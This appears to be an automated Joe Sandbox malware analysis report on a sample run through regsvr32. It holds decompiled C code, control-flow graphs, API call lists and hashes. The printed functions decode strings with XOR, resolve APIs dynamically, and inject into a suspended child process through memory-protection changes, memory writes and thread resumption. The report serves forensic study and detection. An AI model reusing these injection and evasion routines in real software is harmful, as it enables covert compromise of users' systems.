            0x027aefcf
            0x027af02c
            0x00000000
            0x027af02c
            0x027aefd1
            0x027aefdc
            0x027aefdf
            0x027aefe4
            0x027aefe9
            0x027aefec
            0x027aefee
            0x027aeff1
            0x027aeff4
            0x027aeff9
            0x00000000
            0x00000000
            0x00000000
            0x00000000
            0x027aeffb
            0x027aeffb
            0x027af00d
            0x027af01a
            0x027af01e
            0x00000000
            0x00000000
            0x027af020
            0x027af023
            0x027af024
            0x027af02a
            0x00000000
            0x00000000
            0x00000000
            0x027af02a
            0x027af041
            0x027af046
            0x027af04a
            0x00000000
            0x027af056
            0x027af056
            0x027af058
            0x027af058
            0x027af05e
            0x00000000
            0x00000000
            0x027af064
            0x027af068
            0x027af06c
            0x00000000
            0x00000000
            0x00000000
            0x027af06c
            0x027af072
            0x027af07a
            0x027af07f
            0x027af082
            0x027af082
            0x027af084
            0x027af088
            0x027af090
            0x00000000
            0x00000000
            0x027af094
            0x027af09c
            0x00000000
            0x00000000
            0x00000000
            0x027af09c

            APIs
            • LoadLibraryA.KERNELBASE(.dll,?,00000138,00000000), ref: 027AF088
            • GetProcAddress.KERNEL32(00000000,?), ref: 027AF094
            Strings
            Memory Dump Source
            • Source File: 00000002.00000002.385314115.00000000027A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 027A0000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_2_2_27a0000_regsvr32.jbxd
            Yara matches
            Similarity
            • API ID: AddressLibraryLoadProc
            • String ID: .dll
            • API String ID: 2574300362-2738580789
            • Opcode ID: 0e7678505cfe728bc8ebee968777d1729249be57bb77492f40fb57c8a4ae4d7f
            • Instruction ID: aed7daef85c156b8cb9c378bda846021b3d2e10832b37e95c582b505a3737c18
            • Opcode Fuzzy Hash: 0e7678505cfe728bc8ebee968777d1729249be57bb77492f40fb57c8a4ae4d7f
            • Instruction Fuzzy Hash: 59312531A00215CBCB24CF6CC891BAFBBF5AF94328F284569D945E7701D771D941CBA1
            Uniqueness

            Uniqueness Score: -1.00%

            Function 027A8B74 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 94stringCOMMON
            Download Yara Rule

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 266 27a8b74-27a8b89 267 27a8b8b-27a8b8e 266->267 268 27a8bac 266->268 269 27a8b95-27a8ba5 267->269 270 27a8bb1-27a8bd1 268->270 271 27a8ba7-27a8baa 269->271 272 27a8c04-27a8c06 269->272 273 27a8bd3-27a8bd8 270->273 274 27a8be1-27a8be5 270->274 271->268 271->269 272->268 278 27a8c08-27a8c0c call 27a8d70 272->278 273->273 275 27a8bda-27a8bdf 273->275 276 27a8bf3-27a8bfd lstrlenW 274->276 277 27a8be7-27a8bf1 274->277 275->274 275->277 279 27a8bff-27a8c03 276->279 277->276 277->277 281 27a8c11-27a8c19 278->281 282 27a8c1b-27a8c20 281->282 283 27a8c22-27a8c27 281->283 282->279 284 27a8c29-27a8c40 283->284 284->284 285 27a8c42-27a8c45 284->285 285->270
            C-Code - Quality: 80%
            			E027A8B74(intOrPtr __ecx, void* __edx, intOrPtr _a4, signed int _a12) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v28;
				short _v44;
				void* _t38;
				intOrPtr _t47;
				void* _t53;
				intOrPtr _t54;
				intOrPtr _t55;
				intOrPtr _t56;
				void* _t58;
				intOrPtr _t59;
				void* _t62;
				void* _t64;
				signed int _t71;
				signed int _t74;
				void* _t76;
				void* _t77;

				_t71 = _a12;
				_t53 = __edx;
				_v8 = __ecx;
				_t74 = _t71;
				if(_t71 >= __edx) {
					L4:
					_t54 = 0x27bf95e;
					L5:
					_t58 = 0;
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsw");
					asm("movsb");
					asm("stosd");
					asm("stosd");
					asm("stosd");
					asm("stosw");
					asm("stosb");
					_t38 = 0;
					if(_v28 == 0) {
						L8:
						_t64 = _t38;
						if(_t64 == 0) {
							L10:
							lstrlenW( &_v44);
							return _t54;
						} else {
							goto L9;
						}
						do {
							L9:
							_t19 = _t58 + 0x30; // 0x30
							 *((char*)(_t77 + _t58 - 0x28)) = _t19;
							_t58 = _t58 + 1;
						} while (_t58 < _t64);
						goto L10;
					} else {
						goto L6;
					}
					do {
						L6:
						_t38 = _t38 + 1;
					} while ( *((intOrPtr*)(_t77 + _t38 - 0x18)) != 0);
					_t64 = 0xe;
					if(_t38 > _t64) {
						goto L9;
					}
					goto L8;
				}
				_t59 = _a4;
				_a12 = 0x5a;
				while( *((intOrPtr*)(_t74 % _a12 + _t59)) !=  *((intOrPtr*)(_t74 + _v8))) {
					_t74 = _t74 + 1;
					if(_t74 < _t53) {
						continue;
					}
					goto L4;
				}
				_t76 = _t74 - _t71;
				if(_t76 == 0) {
					goto L4;
				}
				_t47 = E027A8D70(_t76 + 1); // executed
				_t55 = _t47;
				_v12 = _t55;
				if(_t55 != 0) {
					_t56 = _a4;
					_t62 = _t55 - _t71;
					do {
						 *(_t62 + _t71) =  *(_t71 % _a12 + _t56) ^  *(_t71 + _v8);
						_t71 = _t71 + 1;
						_t76 = _t76 - 1;
					} while (_t76 != 0);
					_t54 = _v12;
					goto L5;
				}
				return 0x27bf95e;
			}





















            0x027a8b7d
            0x027a8b80
            0x027a8b82
            0x027a8b85
            0x027a8b89
            0x027a8bac
            0x027a8bac
            0x027a8bb1
            0x027a8bbb
            0x027a8bbd
            0x027a8bbe
            0x027a8bbf
            0x027a8bc0
            0x027a8bc2
            0x027a8bc6
            0x027a8bc7
            0x027a8bc8
            0x027a8bc9
            0x027a8bcb
            0x027a8bcc
            0x027a8bd1
            0x027a8be1
            0x027a8be1
            0x027a8be5
            0x027a8bf3
            0x027a8bf7
            0x00000000
            0x00000000
            0x00000000
            0x00000000
            0x027a8be7
            0x027a8be7
            0x027a8be7
            0x027a8bea
            0x027a8bee
            0x027a8bef
            0x00000000
            0x00000000
            0x00000000
            0x00000000
            0x027a8bd3
            0x027a8bd3
            0x027a8bd3
            0x027a8bd4
            0x027a8bdc
            0x027a8bdf
            0x00000000
            0x00000000
            0x00000000
            0x027a8bdf
            0x027a8b8b
            0x027a8b8e
            0x027a8b95
            0x027a8ba7
            0x027a8baa
            0x00000000
            0x00000000
            0x00000000
            0x027a8baa
            0x027a8c04
            0x027a8c06
            0x00000000
            0x00000000
            0x027a8c0c
            0x027a8c11
            0x027a8c13
            0x027a8c19
            0x027a8c24
            0x027a8c27
            0x027a8c29
            0x027a8c39
            0x027a8c3c
            0x027a8c3d
            0x027a8c3d
            0x027a8c42
            0x00000000
            0x027a8c42
            0x00000000

            APIs
            • lstrlenW.KERNEL32(?,00000138,?,027BCA88), ref: 027A8BF7
            Strings
            Memory Dump Source
            • Source File: 00000002.00000002.385314115.00000000027A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 027A0000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_2_2_27a0000_regsvr32.jbxd
            Yara matches
            Similarity
            • API ID: lstrlen
            • String ID: GetCurrentPath$Z
            • API String ID: 1659193697-4005238709
            • Opcode ID: 6269bc3c40dcaf366e8cee776c24dbca9669c78e13aba0e1b0fe38d87063c760
            • Instruction ID: 75b0666fb074db198386c0ac4d7cc0afb74f27b62eadd86195f5c394b3968e98
            • Opcode Fuzzy Hash: 6269bc3c40dcaf366e8cee776c24dbca9669c78e13aba0e1b0fe38d87063c760
            • Instruction Fuzzy Hash: 15214871B02745AFCB01DF6DC8A019EBB76BFCD220B144679D940AB201D731DC468791
            Uniqueness

            Uniqueness Score: -1.00%

            Function 027AC997 Relevance: 4.6, APIs: 3, Instructions: 54COMMON
            Download Yara Rule

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 299 27ac997-27ac9b7 GetTokenInformation 300 27ac9b9-27ac9c2 GetLastError 299->300 301 27ac9fd 299->301 300->301 303 27ac9c4-27ac9d4 call 27a8d70 300->303 302 27ac9ff-27aca03 301->302 306 27ac9da-27ac9ed GetTokenInformation 303->306 307 27ac9d6-27ac9d8 303->307 306->301 308 27ac9ef-27ac9fb call 27a8d86 306->308 307->302 308->307
            C-Code - Quality: 86%
            			E027AC997(union _TOKEN_INFORMATION_CLASS __edx, DWORD* _a4) {
				long _v8;
				void* _v12;
				void* _t12;
				void* _t20;
				void* _t22;
				union _TOKEN_INFORMATION_CLASS _t28;
				void* _t31;

				_push(_t22);
				_push(_t22);
				_t31 = 0;
				_t28 = __edx;
				_t20 = _t22;
				if(GetTokenInformation(_t20, __edx, 0, 0,  &_v8) != 0 || GetLastError() != 0x7a) {
					L6:
					_t12 = _t31;
				} else {
					_t31 = E027A8D70(_v8);
					_v12 = _t31;
					if(_t31 != 0) {
						if(GetTokenInformation(_t20, _t28, _t31, _v8, _a4) != 0) {
							goto L6;
						} else {
							E027A8D86( &_v12, _t16);
							goto L3;
						}
					} else {
						L3:
						_t12 = 0;
					}
				}
				return _t12;
			}










            0x027ac99a
            0x027ac99b
            0x027ac9a2
            0x027ac9aa
            0x027ac9ae
            0x027ac9b7
            0x027ac9fd
            0x027ac9fd
            0x027ac9c4
            0x027ac9cc
            0x027ac9ce
            0x027ac9d4
            0x027ac9ed
            0x00000000
            0x027ac9ef
            0x027ac9f4
            0x00000000
            0x027ac9fa
            0x027ac9d6
            0x027ac9d6
            0x027ac9d6
            0x027ac9d6
            0x027ac9d4
            0x027aca03

            APIs
            • GetTokenInformation.KERNELBASE(00000000,00000001,00000000,00000000,00000000,00000000,00001644,027A0000,00000000,00000000,?,027ACA18,00000000,00000000,?,027ACA41), ref: 027AC9B2
            • GetLastError.KERNEL32(?,027ACA18,00000000,00000000,?,027ACA41,00001644,?,027AE0D1), ref: 027AC9B9
              • Part of subcall function 027A8D70: RtlAllocateHeap.NTDLL(00000008,?,?,027A973A,00000100,?,027A65BF), ref: 027A8D7E
            • GetTokenInformation.KERNELBASE(00000000,00000001,00000000,00000000,?,?,027ACA18,00000000,00000000,?,027ACA41,00001644,?,027AE0D1), ref: 027AC9E8
            Memory Dump Source
            • Source File: 00000002.00000002.385314115.00000000027A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 027A0000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_2_2_27a0000_regsvr32.jbxd
            Yara matches
            Similarity
            • API ID: InformationToken$AllocateErrorHeapLast
            • String ID:
            • API String ID: 2499131667-0
            • Opcode ID: 2802a7017cb74efdf1b6a68ea87f279f66dc300bf614b3a453b4340c5b480014
            • Instruction ID: 988e2373d2a87baa9a3aa59f68be9c1df5c8366aee190cef6052a0e31b7f088d
            • Opcode Fuzzy Hash: 2802a7017cb74efdf1b6a68ea87f279f66dc300bf614b3a453b4340c5b480014
            • Instruction Fuzzy Hash: D3016273A01115BF8B225AA5EC59F9B7FACEE856B1710076AF509F6110EB30DD00CBA0
            Uniqueness

            Uniqueness Score: -1.00%

            Function 027ABE21 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40processCOMMON
            Download Yara Rule

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 311 27abe21-27abe70 call 27a8f0a * 2 CreateProcessW
            C-Code - Quality: 79%
            			E027ABE21(WCHAR* __ecx, struct _PROCESS_INFORMATION* __edx) {
				struct _STARTUPINFOW _v72;
				signed int _t11;

				E027A8F0A(__edx, 0, 0x10);
				E027A8F0A( &_v72, 0, 0x44);
				_v72.cb = 0x44;
				_t11 = CreateProcessW(0, __ecx, 0, 0, 0, 4, 0, 0,  &_v72, __edx);
				asm("sbb eax, eax");
				return  ~( ~_t11) - 1;
			}





            0x027abe32
            0x027abe3f
            0x027abe47
            0x027abe63
            0x027abe69
            0x027abe70

            APIs
              • Part of subcall function 027A8F0A: memset.MSVCRT ref: 027A8F1C
            • CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,00000044,?,?,?,?,?,00000000,00000000), ref: 027ABE63
            Strings
            Memory Dump Source
            • Source File: 00000002.00000002.385314115.00000000027A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 027A0000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_2_2_27a0000_regsvr32.jbxd
            Yara matches
            Similarity
            • API ID: CreateProcessmemset
            • String ID: D
            • API String ID: 2296119082-2746444292
            • Opcode ID: a22ed428a53db0adbc6acaa706b343081a3d04af123f70349cec63847bdcc2cc
            • Instruction ID: 4ad1c130ef04248ff860ca962130bc1e7bb0d43d93c326607aca4b5f15cbfbd0
            • Opcode Fuzzy Hash: a22ed428a53db0adbc6acaa706b343081a3d04af123f70349cec63847bdcc2cc
            • Instruction Fuzzy Hash: 69F065F1A402097EFB20E669CC0EFBF36ADDB81B10F500525BB05EB1C0E5B4AD0586B5
            Uniqueness

            Uniqueness Score: -1.00%

            Function 027AD907 Relevance: 3.1, APIs: 2, Instructions: 120COMMON
            Download Yara Rule

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 316 27ad907-27ad927 call 27ad7df 319 27ada58-27ada5b 316->319 320 27ad92d-27ad94c call 27ab6f4 316->320 323 27ada48-27ada57 call 27a8d86 320->323 324 27ad952-27ad954 320->324 323->319 326 27ad95a-27ad95c 324->326 327 27ada36-27ada46 call 27a8d86 324->327 329 27ad95f-27ad961 326->329 327->323 331 27ad967-27ad986 call 27a8f0a call 27abe21 329->331 332 27ada24-27ada30 329->332 338 27ad9e8-27ad9ec 331->338 339 27ad988-27ad99b call 27ada5c 331->339 332->324 332->327 340 27ad9ee-27ad9f0 338->340 341 27ada17-27ada1e 338->341 339->338 346 27ad99d-27ad9b5 339->346 343 27ad9f2-27ad9f8 340->343 344 27ada01-27ada11 340->344 341->329 341->332 343->344 344->341 349 27ad9b7-27ad9cc GetLastError call 27adb5a 346->349 350 27ad9e5 346->350 353 27ad9ce-27ad9d9 349->353 354 27ad9e1-27ad9e2 FindCloseChangeNotification 349->354 350->338 356 27ad9db 353->356 357 27ad9dc 353->357 354->350 356->357 357->354
            C-Code - Quality: 96%
            			E027AD907(intOrPtr __edx) {
				intOrPtr _v8;
				signed int _v12;
				signed int _v16;
				intOrPtr _v20;
				char _v24;
				intOrPtr _v36;
				char _v40;
				char _v80;
				char _t37;
				intOrPtr _t38;
				signed int _t45;
				void* _t49;
				intOrPtr _t50;
				intOrPtr _t52;
				intOrPtr _t54;
				void* _t56;
				intOrPtr _t59;
				void* _t62;
				intOrPtr _t63;
				signed int _t67;
				intOrPtr _t69;
				void* _t70;
				intOrPtr _t86;
				char _t87;
				void* _t88;

				_v16 = _v16 & 0x00000000;
				_v20 = __edx;
				_t86 = 0;
				_t37 = E027AD7DF( &_v16);
				_t87 = _t37;
				_v24 = _t87;
				_t89 = _t87;
				if(_t87 == 0) {
					return _t37;
				}
				_t38 =  *0x27bf8e4; // 0x47ffc00
				E027AB6F4( &_v80,  *((intOrPtr*)(_t38 + 0xac)) + 7, _t89);
				_v12 = _v12 & 0;
				_t67 = _v16;
				if(_t67 == 0) {
					L21:
					E027A8D86( &_v24, 0);
					return _t86;
				}
				while(_t86 == 0) {
					_t69 = 0;
					_v8 = 0;
					while(_t86 == 0) {
						E027A8F0A( &_v40, _t86, 0x10);
						_t88 = _t88 + 0xc;
						_t49 = E027ABE21( *((intOrPtr*)(_t87 + _v12 * 4)),  &_v40); // executed
						_t94 = _t49;
						if(_t49 >= 0) {
							_t56 = E027ADA5C(E027A623D,  &_v40, _t94, _v20); // executed
							if(_t56 != 0) {
								_t59 =  *0x27bf8e0; // 0x47ff8c0
								_t70 =  *((intOrPtr*)(_t59 + 0xd0))(0, 0, 0,  &_v80);
								if(_t70 != 0) {
									GetLastError();
									_t62 = E027ADB5A( &_v40);
									_t63 =  *0x27bf8e0; // 0x47ff8c0
									if(_t62 != 0) {
										_push(0xea60);
										_push(_t70);
										if( *((intOrPtr*)(_t63 + 0x2c))() == 0) {
											_t86 = _t86 + 1;
										}
										_t63 =  *0x27bf8e0; // 0x47ff8c0
									}
									FindCloseChangeNotification(_t70);
								}
								_t69 = _v8;
							}
						}
						if(_v40 != 0) {
							if(_t86 == 0) {
								_t54 =  *0x27bf8e0; // 0x47ff8c0
								 *((intOrPtr*)(_t54 + 0x110))(_v40, _t86);
							}
							_t50 =  *0x27bf8e0; // 0x47ff8c0
							 *((intOrPtr*)(_t50 + 0x30))(_v36);
							_t52 =  *0x27bf8e0; // 0x47ff8c0
							 *((intOrPtr*)(_t52 + 0x30))(_v40);
						}
						_t69 = _t69 + 1;
						_v8 = _t69;
						if(_t69 < 2) {
							continue;
						} else {
							break;
						}
					}
					_t67 = _v16;
					_t45 = _v12 + 1;
					_v12 = _t45;
					if(_t45 < _t67) {
						continue;
					} else {
						break;
					}
					do {
						goto L20;
					} while (_t67 != 0);
					goto L21;
				}
				L20:
				E027A8D86(_t87, 0xfffffffe);
				_t87 = _t87 + 4;
				_t67 = _t67 - 1;
			}




























            0x027ad90d
            0x027ad916
            0x027ad919
            0x027ad91b
            0x027ad920
            0x027ad922
            0x027ad925
            0x027ad927
            0x027ada5b
            0x027ada5b
            0x027ad92d
            0x027ad93f
            0x027ad944
            0x027ad947
            0x027ad94c
            0x027ada48
            0x027ada4e
            0x00000000
            0x027ada57
            0x027ad952
            0x027ad95a
            0x027ad95c
            0x027ad95f
            0x027ad96e
            0x027ad979
            0x027ad97f
            0x027ad984
            0x027ad986
            0x027ad993
            0x027ad99b
            0x027ad9a6
            0x027ad9b1
            0x027ad9b5
            0x027ad9b7
            0x027ad9c0
            0x027ad9c7
            0x027ad9cc
            0x027ad9ce
            0x027ad9d3
            0x027ad9d9
            0x027ad9db
            0x027ad9db
            0x027ad9dc
            0x027ad9dc
            0x027ad9e2
            0x027ad9e2
            0x027ad9e5
            0x027ad9e5
            0x027ad99b
            0x027ad9ec
            0x027ad9f0
            0x027ad9f2
            0x027ad9fb
            0x027ad9fb
            0x027ada01
            0x027ada09
            0x027ada0c
            0x027ada14
            0x027ada14
            0x027ada17
            0x027ada18
            0x027ada1e
            0x00000000
            0x00000000
            0x00000000
            0x00000000
            0x027ada1e
            0x027ada27
            0x027ada2a
            0x027ada2b
            0x027ada30
            0x00000000
            0x00000000
            0x00000000
            0x00000000
            0x027ada36
            0x00000000
            0x00000000
            0x00000000
            0x027ada36
            0x027ada36
            0x027ada39
            0x027ada3f
            0x027ada43

            APIs
              • Part of subcall function 027A8F0A: memset.MSVCRT ref: 027A8F1C
              • Part of subcall function 027ABE21: CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,00000044,?,?,?,?,?,00000000,00000000), ref: 027ABE63
              • Part of subcall function 027ADA5C: GetThreadContext.KERNELBASE(?,00010002,00000000,00000000,00000000), ref: 027ADABE
              • Part of subcall function 027ADA5C: NtProtectVirtualMemory.NTDLL(?,?,?,00000004,00000000), ref: 027ADB07
              • Part of subcall function 027ADA5C: NtWriteVirtualMemory.NTDLL(?,?,000000E9,00000005,?), ref: 027ADB24
              • Part of subcall function 027ADA5C: NtProtectVirtualMemory.NTDLL(?,?,?,00000000,00000000), ref: 027ADB45
            • GetLastError.KERNEL32(?,?,00000001), ref: 027AD9B7
              • Part of subcall function 027ADB5A: ResumeThread.KERNELBASE(?,027AD9C5,?,?,00000001), ref: 027ADB62
            • FindCloseChangeNotification.KERNELBASE(00000000,?,?,00000001), ref: 027AD9E2
            Memory Dump Source
            • Source File: 00000002.00000002.385314115.00000000027A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 027A0000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_2_2_27a0000_regsvr32.jbxd
            Yara matches
            Similarity
            • API ID: MemoryVirtual$ProtectThread$ChangeCloseContextCreateErrorFindLastNotificationProcessResumeWritememset
            • String ID:
            • API String ID: 2212882986-0
            • Opcode ID: 30c1cd7f85f9e1bcb8f0a4ed532ec8cf9fc687044409694e72ebdd901c3154b7
            • Instruction ID: f875eb2eb850fbae28910a236160df61862bf97773187f2a7afe09103cbc41d4
            • Opcode Fuzzy Hash: 30c1cd7f85f9e1bcb8f0a4ed532ec8cf9fc687044409694e72ebdd901c3154b7
            • Instruction Fuzzy Hash: EB418231A002099FCB21DFA9D899FDE77FAFF88324F144669E515A7650DB709E00CB21
            Uniqueness

            Uniqueness Score: -1.00%

            Function 027A65A7 Relevance: 3.1, APIs: 2, Instructions: 78threadCOMMON
            Download Yara Rule

            Control-flow Graph

            C-Code - Quality: 61%
            			_entry_(void* __ecx, intOrPtr _a4, WCHAR* _a8) {
				long _v8;
				intOrPtr _t15;
				WCHAR* _t23;
				long _t24;
				void* _t28;
				void* _t31;
				intOrPtr _t36;
				void* _t41;
				void* _t48;
				intOrPtr* _t49;

				_push(__ecx);
				if(_a8 != 1) {
					__eflags = _a8;
					if(_a8 != 0) {
						L7:
						__eflags = 1;
						return 1;
					}
					_t15 =  *0x27bf8e0; // 0x47ff8c0
					 *((intOrPtr*)(_t15 + 0xb8))(0xaa);
					L3:
					return 0;
				}
				E027A8D5B();
				E027A972E();
				 *0x27bf8f8 = _a4;
				E027B3D53(_a4);
				 *_t49 = 0x2b4;
				 *0x27bf8e0 = E027AF159(0x27bca88, 0x138);
				 *_t49 = 0xeda;
				_t23 = E027A9F8F(0x27bca88);
				_pop(_t41);
				_a8 = _t23;
				_t24 = GetFileAttributesW(_t23); // executed
				_push( &_a8);
				if(_t24 == 0xffffffff) {
					E027A8D41();
					 *_t49 = 0x525;
					_t28 = E027A9E52(E027A109A(_t41));
					_a8 = _t28;
					__eflags = _t28;
					if(_t28 != 0) {
						_t48 = 0x54;
						 *0x27bf8f0 = E027AF159(0x27bcbf0, _t48);
						E027A6420(_t48, __eflags);
						E027A8D86( &_a8, 0xfffffffe);
						_t36 =  *0x27bf8e0; // 0x47ff8c0
						 *((intOrPtr*)(_t36 + 0xe8))(1, 0x9d0);
					}
					_v8 = 0;
					_t31 = CreateThread(0, 0, E027A6348, 0, 0,  &_v8);
					 *0x27bf904 = _t31;
					__eflags = _t31;
					if(_t31 == 0) {
						goto L3;
					} else {
						goto L7;
					}
				}
				E027A8D41();
				goto L3;
			}













            0x027a65aa
            0x027a65af
            0x027a6693
            0x027a6697
            0x027a668c
            0x027a668e
            0x00000000
            0x027a668e
            0x027a6699
            0x027a66a3
            0x027a660e
            0x00000000
            0x027a660e
            0x027a65b5
            0x027a65ba
            0x027a65c3
            0x027a65c8
            0x027a65d2
            0x027a65e3
            0x027a65e8
            0x027a65ef
            0x027a65f4
            0x027a65f6
            0x027a65f9
            0x027a6605
            0x027a6606
            0x027a6612
            0x027a6617
            0x027a6626
            0x027a662b
            0x027a662e
            0x027a6630
            0x027a6639
            0x027a6644
            0x027a6649
            0x027a6654
            0x027a6659
            0x027a6663
            0x027a6663
            0x027a667d
            0x027a6680
            0x027a6683
            0x027a6688
            0x027a668a
            0x00000000
            0x00000000
            0x00000000
            0x00000000
            0x027a668a
            0x027a6608
            0x00000000

            APIs
              • Part of subcall function 027A8D5B: HeapCreate.KERNELBASE(00000000,00096000,00000000,027A65BA), ref: 027A8D64
              • Part of subcall function 027AF159: GetModuleHandleA.KERNEL32(00000000,?,?,?,027BCA88,?,027A65E3,?), ref: 027AF17B
            • GetFileAttributesW.KERNELBASE(00000000), ref: 027A65F9
            • CreateThread.KERNELBASE(00000000,00000000,027A6348,00000000,00000000,?), ref: 027A6680
            Memory Dump Source
            • Source File: 00000002.00000002.385314115.00000000027A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 027A0000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_2_2_27a0000_regsvr32.jbxd
            Yara matches
            Similarity
            • API ID: Create$AttributesFileHandleHeapModuleThread
            • String ID:
            • API String ID: 607385197-0
            • Opcode ID: aec30b401ebfd9aa328e64c84e2a671855da9e558f6712b38cf57bb4debaedf6
            • Instruction ID: acac057fdf0ed8623e5cde5a0fd0cff7aa8eccd55dccf454fe6f115fe73be99a
            • Opcode Fuzzy Hash: aec30b401ebfd9aa328e64c84e2a671855da9e558f6712b38cf57bb4debaedf6
            • Instruction Fuzzy Hash: 51217471540205AFDF06BFB8D829B6937EDAF84730F148B29F129DA280EB74C5408F22
            Uniqueness

            Uniqueness Score: -1.00%

            Function 6D506B43 Relevance: 3.0, APIs: 2, Instructions: 37memoryCOMMON
            Download Yara Rule

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 394 6d506b43-6d506b61 395 6d506b63-6d506b6e GetProcessHeap 394->395 396 6d506bb6-6d506bb9 394->396 397 6d506b70-6d506b74 RtlFreeHeap 395->397 398 6d506b7a-6d506ba0 395->398 397->398 398->396 399 6d506ba2 398->399 400 6d506ba4-6d506bb4 399->400 400->396 400->400
            C-Code - Quality: 100%
            			E6D506B43(intOrPtr _a4, signed int _a8) {
				signed int _t18;
				void* _t19;
				signed int _t25;
				void* _t27;
				void* _t28;
				intOrPtr _t29;

				_t25 = _a8;
				_t29 = _a4;
				_t28 =  *(_t29 + 0x8c);
				_t18 =  *(_t29 + 0x148) | _t25;
				 *((intOrPtr*)(_t29 + 0x3c)) =  *((intOrPtr*)(_t29 + 0x3c)) - _t18;
				if(_t28 != 0) {
					_t19 = GetProcessHeap();
					 *((intOrPtr*)(_t29 + 0x30)) =  *((intOrPtr*)(_t29 + 0x30)) + _t25;
					if(_t19 != 0) {
						RtlFreeHeap(_t19, 0, _t28); // executed
					}
					 *(_t29 + 0xc4) =  *(_t29 + 0xc4) |  *((intOrPtr*)(_t29 + 0x88)) + 0x00000118;
					_t18 =  *((intOrPtr*)( *((intOrPtr*)(_t29 + 0x1d4)) + 0x4c)) + 0x898;
					if(_t18 != 0x2ea7) {
						_t27 = 0x2ea7 - _t18;
						do {
							_t18 =  *(_t29 + 0x124);
							 *(_t18 + 0x24) =  *(_t18 + 0x24) | 0x0000081a;
							_t27 = _t27 - 1;
						} while (_t27 != 0);
					}
				}
				return _t18;
			}









            0x6d506b44
            0x6d506b49
            0x6d506b54
            0x6d506b5a
            0x6d506b5c
            0x6d506b61
            0x6d506b63
            0x6d506b69
            0x6d506b6e
            0x6d506b74
            0x6d506b74
            0x6d506b8a
            0x6d506b99
            0x6d506ba0
            0x6d506ba2
            0x6d506ba4
            0x6d506ba4
            0x6d506baa
            0x6d506bb1
            0x6d506bb1
            0x6d506ba4
            0x6d506ba0
            0x6d506bb9

            APIs
            • GetProcessHeap.KERNEL32(00000532,?,-00000484,6D5155FB,?,00002B78,?,6D51A458,?,?,6D515142,?,?,?,?,?), ref: 6D506B63
            • RtlFreeHeap.NTDLL(00000000,00000000,?), ref: 6D506B74
            Memory Dump Source
            • Source File: 00000002.00000002.385586279.000000006D501000.00000020.00000001.01000000.00000003.sdmp, Offset: 6D500000, based on PE: true
            • Associated: 00000002.00000002.385570851.000000006D500000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.385653547.000000006D51B000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.385728691.000000006D540000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.385742413.000000006D541000.00000008.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.385767720.000000006D55C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.385779816.000000006D55F000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_2_2_6d500000_regsvr32.jbxd
            Similarity
            • API ID: Heap$FreeProcess
            • String ID:
            • API String ID: 3859560861-0
            • Opcode ID: dba6e01c95109f24d5005f6a89051358fc16824115a5b0717516e5b75578e8a5
            • Instruction ID: e5868095f0a70c8b1806ffdf6a1a42caca46f69d162f13d52939ecf28a8c213b
            • Opcode Fuzzy Hash: dba6e01c95109f24d5005f6a89051358fc16824115a5b0717516e5b75578e8a5
            • Instruction Fuzzy Hash: C40131766017029FEB68DB79CA85B96B7F4FF55321F01882DE5AAC3A40DB70F8408B51
            Uniqueness

            Uniqueness Score: -1.00%

            Function 027AF159 Relevance: 3.0, APIs: 2, Instructions: 35libraryCOMMON
            Download Yara Rule
            C-Code - Quality: 47%
            			E027AF159(void* __ecx, void* __edx, intOrPtr _a4) {
				char _v8;
				char _t5;
				struct HINSTANCE__* _t7;
				void* _t10;
				void* _t12;
				void* _t22;
				void* _t25;

				_push(__ecx);
				_t12 = __ecx;
				_t22 = __edx;
				_t5 = E027A9F75(_a4);
				_t25 = 0;
				_v8 = _t5;
				_push(_t5);
				if(_a4 != 0x2b4) {
					_t7 = LoadLibraryA(); // executed
				} else {
					_t7 = GetModuleHandleA();
				}
				if(_t7 != 0) {
					_t10 = E027AF10E(_t12, _t22, _t7); // executed
					_t25 = _t10;
				}
				E027A8D2E( &_v8);
				return _t25;
			}










            0x027af15c
            0x027af15f
            0x027af165
            0x027af167
            0x027af16c
            0x027af16e
            0x027af178
            0x027af179
            0x027af188
            0x027af17b
            0x027af17b
            0x027af17b
            0x027af18c
            0x027af193
            0x027af199
            0x027af199
            0x027af19e
            0x027af1a9

            APIs
            • GetModuleHandleA.KERNEL32(00000000,?,?,?,027BCA88,?,027A65E3,?), ref: 027AF17B
            • LoadLibraryA.KERNELBASE(00000000,?,?,?,027BCA88,?,027A65E3,?), ref: 027AF188
            Memory Dump Source
            • Source File: 00000002.00000002.385314115.00000000027A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 027A0000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_2_2_27a0000_regsvr32.jbxd
            Yara matches
            Similarity
            • API ID: HandleLibraryLoadModule
            • String ID:
            • API String ID: 4133054770-0
